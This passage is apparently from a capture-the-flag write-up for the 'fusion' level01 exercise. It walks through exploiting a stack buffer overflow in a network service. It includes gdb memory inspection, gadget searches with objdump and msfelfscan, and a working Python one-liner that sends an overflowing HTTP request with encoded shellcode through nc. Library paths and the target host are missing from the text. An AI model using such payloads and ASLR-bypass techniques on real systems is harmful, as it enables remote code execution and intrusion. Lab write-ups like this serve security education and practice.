0xb7830000 0xb7831000 0x1000 0x178000 /lib/i386-linux-gnu/
0xb7831000 0xb7834000 0x3000 0
0xb783e000 0xb7840000 0x2000 0
0xb7840000 0xb7841000 0x1000 0 [vdso]
0xb7841000 0xb785f000 0x1e000 0 /lib/i386-linux-gnu/
0xb785f000 0xb7860000 0x1000 0x1d000 /lib/i386-linux-gnu/
0xb7860000 0xb7861000 0x1000 0x1e000 /lib/i386-linux-gnu/
0xbfeeb000 0xbff0c000 0x21000 0 [stack]

That’s a little difficult to read, but libc was loaded at 0xb76b8000. Now I confirm our jump is indeed where I think it is:

(gdb) x/i 0xb76b8000+0x1536cf
0xb780b6cf: jmp FWORD PTR [esi+0x6]

At first I thought this would work. Unfortunately, that jumps to the address of whatever is at the pointer esi+0x6… which in our case is 43434343 for testing purposes. We just want to jump to ESI. Unfortunately, I could find no jumps to match that criteria. Unfortunately, the straight jmp esis didn’t come with an offset, but we can work with that. In fact, after looking at the instruction made by the garbage bits (which seemed to be constant), it comes out as valid and executable.

root@fusion:/opt/fusion/bin# objdump -D /lib/i386-linux-gnu/ | grep jmp | grep esi | grep e6 | grep -v “(”
77b63: ff e6 jmp *%esi

(gdb) x/i 0xb76b8000+0x77b63
0xb772fb63 <_wordcopy_fwd_aligned+51>: jmp esi

I went ahead and tested this and unfortunately found it still segfaults. After killing the process and reexamining the location of libc I found it had moved! It appears the location of all the libraries is still randomized. At this juncture I realized my original tactics wouldn’t work. The only module whose location doesn’t change is level01 itself.  I found a better way of doing things and used msfelfscan to check for jmps in the level01 module:

root@fusion:/opt/fusion/bin# /opt/metasploit-framework/msfelfscan -j esi,esp,eax,edx,edi,ecx level01
0x08048c1f call eax
0x08049a6b call eax
0x08049f4f jmp esp

Not many options unfortunately. On a whim though I checked out ESP:

(gdb) x/8x $esp
0xbfc653fc: 0x08049f4f 0xbfc65400 0x00000020 0x00000004
0xbfc6540c: 0x00000000 0x001761e4 0xbfc654a0 0x20544547

It looks like I may control the last two bytes of what ESP points to. For giggles, I threw in \xFF\xE6 right after my return address. FFE6 is the assembly for jmp ESI. To my surprise, it worked! I successfully jumped from ESP to ESI to the buffer I controlled!

fusion@fusion:~$ python -c ‘print “GET ” + “A”*139 + “\x4f\x9f\x04\x08” + “\xFF\xE6″ + ” HTTP/1.1\r\n” + “\x59\x53\x4f\x42\x59\x1e\x51\x5d\x0e\x60\x1e\x47\x5d\x90\x46\x92\x57\x56\x91\x47\x60\x4f\x98\x48\x5f\xd6\x5f\x48\x46\x91\x49\x58\x06\x4f\x5b\x5e\x9f\x51\x5e\x5b\x60\x4d\x93\x41\x5f\xfd\x55\xfc\x55\xfc\xdb\xca\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x14\xbf\x05\x58\xc6\x87\x31\x7d\x19\x03\x7d\x19\x83\xed\xfc\xe7\xad\xf7\x5c\x10\xae\xab\x21\x8d\x5b\x4e\x2f\xd0\x2c\x28\xe2\x92\x16\xeb\xae\xfa\xaa\x13\x5e\xa6\xc0\x03\x31\x06\x9c\xc5\xdb\xc0\xc6\xc8\x9c\x85\xb6\xd6\x2f\x91\x88\xb1\x82\x19\xab\x8d\x7b\xd4\xac\x7d\xda\x8c\x93\xd9\x10\xd0\xa5\xa0\x52\xb8\x1a\x7c\xd0\x50\x0d\xad\x74\xc9\xa3\x38\x9b\x59\x6f\xb2\xbd\xe9\x84\x09\xbd”‘ | nc 20001

I tested it outside of GDB and it worked like a champ!